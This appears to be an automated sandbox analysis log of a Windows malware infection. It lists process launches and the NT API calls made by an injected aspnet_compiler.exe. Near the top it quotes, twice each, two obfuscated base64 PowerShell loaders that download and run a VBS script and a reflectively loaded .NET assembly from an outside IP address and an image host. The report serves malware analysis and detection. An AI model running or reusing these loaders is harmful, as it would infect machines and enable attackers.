Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poweRshElL.Exe -ex bypaSs -nOp -w 1 -c DEviCECrEdEnTIALDePLOYMENT.ExE ; INvoKe-eXPrESSioN($(INVOKe-EXPressION('[syStEm.text.eNCodinG]'+[cHar]58+[ChAr]0x3A+'Utf8.GEtSTrInG([SYsteM.cOnvErT]'+[ChaR]58+[ChaR]0X3A+'froMbAsE64strinG('+[Char]34+'JHN2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFUmRFZklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT04uRExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExlU3ZOR3Z3YWtaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWJFcyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhLbWpGVFRlLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtVGtaVXFXVG53KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkdUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRzdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjI5Lzc3MC9zZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZXR0ZXIudElGIiwiJEVudjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3doYXRkb2luZ2ZvcmJlLnZiUyIsMCwwKTtTVEFSVC1TTGVlUCgzKTtpSSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZS52YlMi'+[cHAr]34+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $doctor = 'JGJlaSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRhbW9uaWVtaWEgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRxdWFscXVlciA9ICRhbW9uaWVtaWEuRG93bmxvYWREYXRhKCRiZWkpOyRhdGVycmFnZW0gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcXVhbHF1ZXIpOyRsZWlyaWEgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGFjYXBuYSA9ICc8PEJBU0U2NF9FTkQ+Pic7JGlucXVpZXR1ZGUgPSAkYXRlcnJhZ2VtLkluZGV4T2YoJGxlaXJpYSk7JHBlY3RhciA9ICRhdGVycmFnZW0uSW5kZXhPZigkYWNhcG5hKTskaW5xdWlldHVkZSAtZ2UgMCAtYW5kICRwZWN0YXIgLWd0ICRpbnF1aWV0dWRlOyRpbnF1aWV0dWRlICs9ICRsZWlyaWEuTGVuZ3RoOyRjb25kaWNlbnRlID0gJHBlY3RhciAtICRpbnF1aWV0dWRlOyRuaWNvbGF0byA9ICRhdGVycmFnZW0uU3Vic3RyaW5nKCRpbnF1aWV0dWRlLCAkY29uZGljZW50ZSk7JG1hZHJpbGhlaXJhID0gLWpvaW4gKCRuaWNvbGF0by5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkbmljb2xhdG8uTGVuZ3RoKV07JGNyZWR1bGlkYWRlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbWFkcmlsaGVpcmEpOyRyZWRpemltYXIgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjcmVkdWxpZGFkZSk7JHJlYmVsbGFkb3IgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKCdWQUknKTskcmViZWxsYWRvci5JbnZva2UoJG51bGwsIEAoJ3R4dC5BQ01BQy8wNzcvOTIuMzIxLjU0Mi4yNzEvLzpwdHRoJywgJyRyYXBhZG8nLCAnJHJhcGFkbycsICckcmFwYWRvJywgJ2FzcG5ldF9jb21waWxlcicsICckcmFwYWRvJywgJyRyYXBhZG8nLCckcmFwYWRvJywnJHJhcGFkbycsJyRyYXBhZG8nLCckcmFwYWRvJywnJHJhcGFkbycsJzEnLCckcmFwYWRvJykpOw==';$theatrelho = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($doctor));Invoke-Expression $theatrelho
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poweRshElL.Exe -ex bypaSs -nOp -w 1 -c DEviCECrEdEnTIALDePLOYMENT.ExE ; INvoKe-eXPrESSioN($(INVOKe-EXPressION('[syStEm.text.eNCodinG]'+[cHar]58+[ChAr]0x3A+'Utf8.GEtSTrInG([SYsteM.cOnvErT]'+[ChaR]58+[ChaR]0X3A+'froMbAsE64strinG('+[Char]34+'JHN2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFUmRFZklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT04uRExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExlU3ZOR3Z3YWtaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWJFcyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhLbWpGVFRlLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtVGtaVXFXVG53KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkdUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRzdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjI5Lzc3MC9zZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZXR0ZXIudElGIiwiJEVudjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3doYXRkb2luZ2ZvcmJlLnZiUyIsMCwwKTtTVEFSVC1TTGVlUCgzKTtpSSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZS52YlMi'+[cHAr]34+'))')))" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $doctor = 'JGJlaSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRhbW9uaWVtaWEgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRxdWFscXVlciA9ICRhbW9uaWVtaWEuRG93bmxvYWREYXRhKCRiZWkpOyRhdGVycmFnZW0gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcXVhbHF1ZXIpOyRsZWlyaWEgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGFjYXBuYSA9ICc8PEJBU0U2NF9FTkQ+Pic7JGlucXVpZXR1ZGUgPSAkYXRlcnJhZ2VtLkluZGV4T2YoJGxlaXJpYSk7JHBlY3RhciA9ICRhdGVycmFnZW0uSW5kZXhPZigkYWNhcG5hKTskaW5xdWlldHVkZSAtZ2UgMCAtYW5kICRwZWN0YXIgLWd0ICRpbnF1aWV0dWRlOyRpbnF1aWV0dWRlICs9ICRsZWlyaWEuTGVuZ3RoOyRjb25kaWNlbnRlID0gJHBlY3RhciAtICRpbnF1aWV0dWRlOyRuaWNvbGF0byA9ICRhdGVycmFnZW0uU3Vic3RyaW5nKCRpbnF1aWV0dWRlLCAkY29uZGljZW50ZSk7JG1hZHJpbGhlaXJhID0gLWpvaW4gKCRuaWNvbGF0by5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkbmljb2xhdG8uTGVuZ3RoKV07JGNyZWR1bGlkYWRlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbWFkcmlsaGVpcmEpOyRyZWRpemltYXIgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjcmVkdWxpZGFkZSk7JHJlYmVsbGFkb3IgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKCdWQUknKTskcmViZWxsYWRvci5JbnZva2UoJG51bGwsIEAoJ3R4dC5BQ01BQy8wNzcvOTIuMzIxLjU0Mi4yNzEvLzpwdHRoJywgJyRyYXBhZG8nLCAnJHJhcGFkbycsICckcmFwYWRvJywgJ2FzcG5ldF9jb21waWxlcicsICckcmFwYWRvJywgJyRyYXBhZG8nLCckcmFwYWRvJywnJHJhcGFkbycsJyRyYXBhZG8nLCckcmFwYWRvJywnJHJhcGFkbycsJzEnLCckcmFwYWRvJykpOw==';$theatrelho = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($doctor));Invoke-Expression $theatrelho Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0042C853 NtClose, 12_2_0042C853
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F35C0 NtCreateMutant,LdrInitializeThunk, 12_2_012F35C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F2B60 NtClose,LdrInitializeThunk, 12_2_012F2B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F2DF0 NtQuerySystemInformation,LdrInitializeThunk, 12_2_012F2DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F2C70 NtFreeVirtualMemory,LdrInitializeThunk, 12_2_012F2C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F3010 NtOpenDirectoryObject, 12_2_012F3010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F3090 NtSetValueKey, 12_2_012F3090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F4340 NtSetContextThread, 12_2_012F4340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F4650 NtSuspendThread, 12_2_012F4650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F39B0 NtGetContextThread, 12_2_012F39B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F2BA0 NtEnumerateValueKey, 12_2_012F2BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F2B80 NtQueryInformationFile, 12_2_012F2B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F2BE0 NtQueryValueKey, 12_2_012F2BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F2BF0 NtAllocateVirtualMemory, 12_2_012F2BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F2AB0 NtWaitForSingleObject, 12_2_012F2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F2AF0 NtWriteFile, 12_2_012F2AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F2AD0 NtReadFile, 12_2_012F2AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F2D30 NtUnmapViewOfSection, 12_2_012F2D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F2D00 NtSetInformationFile, 12_2_012F2D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F2D10 NtMapViewOfSection, 12_2_012F2D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F3D10 NtOpenProcessToken, 12_2_012F3D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F3D70 NtOpenThread, 12_2_012F3D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F2DB0 NtEnumerateKey, 12_2_012F2DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F2DD0 NtDelayExecution, 12_2_012F2DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F2C00 NtQueryInformationProcess, 12_2_012F2C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F2C60 NtCreateKey, 12_2_012F2C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F2CA0 NtQueryInformationToken, 12_2_012F2CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F2CF0 NtOpenProcess, 12_2_012F2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F2CC0 NtQueryVirtualMemory, 12_2_012F2CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F2F30 NtCreateSection, 12_2_012F2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F2F60 NtCreateProcessEx, 12_2_012F2F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F2FA0 NtQuerySection, 12_2_012F2FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F2FB0 NtResumeThread, 12_2_012F2FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F2F90 NtProtectVirtualMemory, 12_2_012F2F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F2FE0 NtCreateFile, 12_2_012F2FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F2E30 NtWriteVirtualMemory, 12_2_012F2E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F2EA0 NtAdjustPrivilegesToken, 12_2_012F2EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F2E80 NtReadVirtualMemory, 12_2_012F2E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F2EE0 NtQueueApcThread, 12_2_012F2EE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_04E487B0 8_2_04E487B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_04E47FD4 8_2_04E47FD4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_004168EE 12_2_004168EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_004168F3 12_2_004168F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_004030B0 12_2_004030B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_00410183 12_2_00410183
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0040E183 12_2_0040E183
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0040E2C7 12_2_0040E2C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0040E2D3 12_2_0040E2D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_004044BB 12_2_004044BB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0042EE63 12_2_0042EE63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0040FF61 12_2_0040FF61
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0040FF63 12_2_0040FF63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_00402724 12_2_00402724
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_004027C0 12_2_004027C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012B0100 12_2_012B0100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0135A118 12_2_0135A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F516C 12_2_012F516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0138B16B 12_2_0138B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012AF172 12_2_012AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01348158 12_2_01348158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_013801AA 12_2_013801AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012CB1B0 12_2_012CB1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_013781CC 12_2_013781CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0137F0E0 12_2_0137F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_013770E9 12_2_013770E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012C70C0 12_2_012C70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0136F0CC 12_2_0136F0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0137132D 12_2_0137132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0137A352 12_2_0137A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012AD34C 12_2_012AD34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0130739A 12_2_0130739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012CE3F0 12_2_012CE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_013803E6 12_2_013803E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01360274 12_2_01360274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012C52A0 12_2_012C52A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_013612ED 12_2_013612ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012DB2C0 12_2_012DB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012C0535 12_2_012C0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01377571 12_2_01377571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0135D5B0 12_2_0135D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01380591 12_2_01380591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0137F43F 12_2_0137F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012B1460 12_2_012B1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01372446 12_2_01372446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0136E4F6 12_2_0136E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012C0770 12_2_012C0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012E4750 12_2_012E4750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0137F7B0 12_2_0137F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012BC7C0 12_2_012BC7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012DC6E0 12_2_012DC6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_013716CC 12_2_013716CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012D6962 12_2_012D6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012C9950 12_2_012C9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012DB950 12_2_012DB950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012C29A0 12_2_012C29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0138A9A6 12_2_0138A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0132D800 12_2_0132D800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012C2840 12_2_012C2840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012CA840 12_2_012CA840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012A68B8 12_2_012A68B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012C38E0 12_2_012C38E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012EE8F0 12_2_012EE8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0137FB76 12_2_0137FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0137AB40 12_2_0137AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012DFB80 12_2_012DFB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01335BF0 12_2_01335BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012FDBF9 12_2_012FDBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01376BD7 12_2_01376BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01333A6C 12_2_01333A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01377A46 12_2_01377A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0137FA49 12_2_0137FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01305AA0 12_2_01305AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0135DAAC 12_2_0135DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012BEA80 12_2_012BEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0136DAC6 12_2_0136DAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012CAD00 12_2_012CAD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01377D73 12_2_01377D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012C3D40 12_2_012C3D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01371D5A 12_2_01371D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012D8DBF 12_2_012D8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012BADE0 12_2_012BADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012DFDC0 12_2_012DFDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01339C32 12_2_01339C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012C0C00 12_2_012C0C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01360CB5 12_2_01360CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0137FCF2 12_2_0137FCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012B0CF2 12_2_012B0CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01302F28 12_2_01302F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012E0F30 12_2_012E0F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0137FF09 12_2_0137FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01334F40 12_2_01334F40
